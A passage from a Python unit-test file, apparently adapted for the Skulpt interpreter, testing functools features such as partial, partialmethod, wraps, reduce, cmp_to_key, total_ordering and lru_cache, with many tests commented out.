# self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
# finally:
# f.__setstate__((capture, (), {}, {}))
# def test_pickle(self):
# with self.AllowPickle():
# f = self.partial(signature, ['asdf'], bar=[True])
# f.attr = []
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# f_copy = pickle.loads(pickle.dumps(f, proto))
# self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
# def test_deepcopy(self):
# f = self.partial(signature, ['asdf'], bar=[True])
# f.attr = []
# f_copy = copy.deepcopy(f)
# self.assertEqual(signature(f_copy), signature(f))
# self.assertIsNot(f_copy.attr, f.attr)
# self.assertIsNot(f_copy.args, f.args)
# self.assertIsNot(f_copy.args[0], f.args[0])
# self.assertIsNot(f_copy.keywords, f.keywords)
# self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
# def test_setstate(self):
# f = self.partial(signature)
# f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
# self.assertEqual(signature(f),
# (capture, (1,), dict(a=10), dict(attr=[])))
# self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
# f.__setstate__((capture, (1,), dict(a=10), None))
# self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
# self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
# f.__setstate__((capture, (1,), None, None))
# #self.assertEqual(signature(f), (capture, (1,), {}, {}))
# self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
# self.assertEqual(f(2), ((1, 2), {}))
# self.assertEqual(f(), ((1,), {}))
# f.__setstate__((capture, (), {}, None))
# self.assertEqual(signature(f), (capture, (), {}, {}))
# self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
# self.assertEqual(f(2), ((2,), {}))
# self.assertEqual(f(), ((), {}))
# def test_setstate_errors(self):
# f = self.partial(signature)
# self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
# self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
# self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
# self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
# self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
# self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
# self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
# def test_setstate_subclasses(self):
# f = self.partial(signature)
# f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
# s = signature(f)
# self.assertEqual(s, (capture, (1,), dict(a=10), {}))
# self.assertIs(type(s[1]), tuple)
# self.assertIs(type(s[2]), dict)
# r = f()
# self.assertEqual(r, ((1,), {'a': 10}))
# self.assertIs(type(r[0]), tuple)
# self.assertIs(type(r[1]), dict)
# f.__setstate__((capture, BadTuple((1,)), {}, None))
# s = signature(f)
# self.assertEqual(s, (capture, (1,), {}, {}))
# self.assertIs(type(s[1]), tuple)
# r = f(2)
# self.assertEqual(r, ((1, 2), {}))
# self.assertIs(type(r[0]), tuple)
# def test_recursive_pickle(self):
# with self.AllowPickle():
# f = self.partial(capture)
# f.__setstate__((f, (), {}, {}))
# try:
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# with self.assertRaises(RecursionError):
# pickle.dumps(f, proto)
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (f,), {}, {}))
# try:
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# f_copy = pickle.loads(pickle.dumps(f, proto))
# try:
# self.assertIs(f_copy.args[0], f_copy)
# finally:
# f_copy.__setstate__((capture, (), {}, {}))
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (), {'a': f}, {}))
# try:
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# f_copy = pickle.loads(pickle.dumps(f, proto))
# try:
# self.assertIs(f_copy.keywords['a'], f_copy)
# finally:
# f_copy.__setstate__((capture, (), {}, {}))
# finally:
# f.__setstate__((capture, (), {}, {}))
# # Issue 6083: Reference counting bug
# def test_setstate_refcount(self):
# class BadSequence:
# def __len__(self):
# return 4
# def __getitem__(self, key):
# if key == 0:
# return max
# elif key == 1:
# return tuple(range(1000000))
# elif key in (2, 3):
# return {}
# raise IndexError
# f = self.partial(object)
# self.assertRaises(TypeError, f.__setstate__, BadSequence())
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
# class TestPartialPy(TestPartial, unittest.TestCase):
# partial = py_functools.partial
# class AllowPickle:
# def __init__(self):
# self._cm = replaced_module("functools", py_functools)
# def __enter__(self):
# return self._cm.__enter__()
# def __exit__(self, type, value, tb):
# return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
# class PyPartialSubclass(py_functools.partial):
# pass
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = lambda *args: None
# class TestPartialPySubclass(TestPartialPy):
# partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
# with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(self.A.__dict__['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
# def test_abstract(self):
# class Abstract(abc.ABCMeta):
# @abc.abstractmethod
# def add(self, x, y):
# pass
# add5 = functools.partialmethod(add, 5)
# self.assertTrue(Abstract.add.__isabstractmethod__)
# self.assertTrue(Abstract.add5.__isabstractmethod__)
# for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
# self.assertFalse(getattr(func, '__isabstractmethod__', False))
# def test_positional_only(self):
# def f(a, b, /):
# return a + b
# p = functools.partial(f, 1)
# self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
f.__doc__ = 'This is a test' # skulpt does not yet parse docstrings
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
# @unittest.skipIf(sys.flags.optimize >= 2,
# "Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
# @support.requires_docstrings
# @unittest.skipIf(sys.flags.optimize >= 2,
# "Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
f.__doc__ = "This is a test" # skulpt does not yet parse docstrings
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
# @unittest.skipIf(sys.flags.optimize >= 2,
# "Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
# class TestReducePy(TestReduce, unittest.TestCase):
# reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
# self.assertNotIsInstance(k, collections.abc.Hashable)
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
# class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
# cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
# with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
# with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
# def test_pickle(self):
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# for name in '__lt__', '__gt__', '__le__', '__ge__':
# with self.subTest(method=name, proto=proto):
# method = getattr(Orderable_LT, name)
# method_copy = pickle.loads(pickle.dumps(method, proto))
# self.assertIs(method_copy, method)
# @functools.total_ordering
# class Orderable_LT:
# def __init__(self, value):
# self.value = value
# def __lt__(self, other):
# return self.value < other.value
# def __eq__(self, other):
# return self.value == other.value
def ignore_skulpt(f):
@functools.wraps(f)
def wrapper(self, *args, **kws):
if (self.verbosity > 1):
print(f.__name__, 'was ignored by skulpt')
return wrapper
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
global f_cnt
@self.module.lru_cache(0)
def f():
global f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
global f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
global f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
